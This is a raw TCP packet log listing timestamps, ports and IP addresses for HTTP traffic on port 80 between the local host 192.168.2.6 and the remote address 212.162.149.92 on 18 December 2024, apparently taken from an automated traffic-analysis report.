                                                            Dec 18, 2024 11:05:14.623016119 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.623102903 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.623131990 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.623254061 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.624593019 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.624661922 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.626394987 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.626421928 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.626457930 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.627346992 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.628264904 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.628329992 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.628365993 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.628422022 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.630229950 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.630286932 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.630409002 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.630676031 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.632139921 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.632252932 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.632989883 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.633052111 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.633162975 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.633219957 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.634932041 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.635000944 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.635035992 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.635093927 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.636653900 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.636728048 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.636765003 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.636826038 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.638508081 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.638582945 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.638608932 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.638669014 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.640422106 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.640512943 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.640551090 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.642216921 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.642246962 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.642286062 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.642694950 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.644084930 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.644156933 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.644166946 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.644258976 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.645951033 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.646024942 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.647835970 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.647864103 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.647910118 CET8049868212.162.149.92192.168.2.6
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 18, 2024 11:05:14.649688005 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.649710894 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.649725914 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.651504993 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.651545048 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.651596069 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.651684046 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.653332949 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.653446913 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.653470993 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.655210018 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.655235052 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.655292034 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.655323029 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.656374931 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.657066107 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.657118082 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.657315969 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.659056902 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.659181118 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.659420967 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.660825014 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.660924911 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.660957098 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.662620068 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.662851095 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.662879944 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.663374901 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.664473057 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.664570093 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.666348934 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.666452885 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.666480064 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.667591095 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.668276072 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.668373108 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.668478966 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.670073986 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.670171022 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.670186996 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.670245886 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.671900988 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.671962976 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.672019005 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.672074080 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.673850060 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.673921108 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.673971891 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.674031019 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.675662994 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.675724983 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.675753117 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.675806999 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.677495003 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.677557945 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.677572012 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.677625895 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.679343939 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.679411888 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.679476023 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.679697990 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.681214094 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.681260109 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.681292057 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.681322098 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.683064938 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.683187962 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.683211088 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.683249950 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.685097933 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.685214996 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.685230970 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.685318947 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.686764002 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.686834097 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.686836958 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.686892986 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.688947916 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.689002037 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.689018011 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.689055920 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.690565109 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.690675974 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.690794945 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.691109896 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.692301989 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.692362070 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.692434072 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.692513943 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.694339991 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.694401979 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.694417953 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.694474936 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.696285009 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.696351051 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.696361065 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.696412086 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.697882891 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.697953939 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.698009968 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.698064089 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.699937105 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.699989080 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.700001955 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.700073957 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.701612949 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.701704979 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.701755047 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.701809883 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.703479052 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.703555107 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.703613043 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.703669071 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.705322027 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.705395937 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.705440044 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.705524921 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.707250118 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.707333088 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.707389116 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.707441092 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.709029913 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.709120989 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.709140062 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.709196091 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.710892916 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.710973024 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.711009026 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.711066961 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.712702036 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.712796926 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.712812901 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.712867975 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.714576960 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.714679956 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.714683056 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.714931011 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.716438055 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.716533899 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.716572046 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.716626883 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.718327999 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.718400002 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.718432903 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.718488932 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.720339060 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.720360041 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.720484018 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.722012043 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.722079039 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.722167015 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.722223997 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.723869085 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.723937988 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.724060059 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.724123001 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.725873947 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.725888014 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.725976944 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.727596045 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.727689981 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.727735043 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.727799892 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.729487896 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.729583979 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.729598999 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.729939938 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.731412888 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.731488943 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.731513023 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.731723070 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.733319998 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.733374119 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.733395100 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.733433008 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.735121965 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.735184908 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.735358000 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.736907005 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.736974001 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.737066031 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.737127066 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.739253998 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.739322901 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.739516020 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.739581108 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.741275072 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.741331100 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.741336107 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.741449118 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.742984056 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.743040085 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.743057013 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.743123055 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.744561911 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.744628906 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.744661093 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.744716883 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.746499062 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.746534109 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.746562004 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.746592045 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.748045921 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.748132944 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.748138905 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.748198032 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.749880075 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.749933004 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.750139952 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.751741886 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.751873970 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.751883030 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.751935005 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.753647089 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.753710032 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.753765106 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.753854036 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.755685091 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.755783081 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.755804062 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.755867958 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.757373095 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.757406950 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.757437944 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.757468939 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.759169102 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.759237051 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.759277105 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.759357929 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.761090040 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.761145115 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.761159897 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.761234045 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.762887955 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.762964010 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.763019085 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.763086081 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.764853001 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.764889002 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.764919043 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.765072107 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.766588926 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.766669989 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.766726971 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.766788006 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.768485069 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.768538952 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.768564939 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.768642902 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.770358086 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.770412922 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.770423889 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.770498991 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.772159100 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.772213936 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.772238970 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.772280931 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.774044037 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.774108887 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.774111986 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.774167061 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.775861979 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.775929928 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.776000977 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.776062012 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.777842045 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.777916908 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.777965069 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.778177977 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.779551029 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.779630899 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.779695034 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.779763937 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.781407118 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.781572104 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.781634092 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.781712055 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.783284903 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.783375025 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.783422947 CET  80           49868      212.162.149.92   192.168.2.6
Dec 18, 2024 11:05:14.783551931 CET  49868        80         192.168.2.6      212.162.149.92
Dec 18, 2024 11:05:14.785151005 CET  80           49868      212.162.149.92   192.168.2.6
                                                            Dec 18, 2024 11:05:14.785244942 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.785252094 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.785306931 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.786995888 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.787203074 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.787240028 CET4986880192.168.2.6212.162.149.92
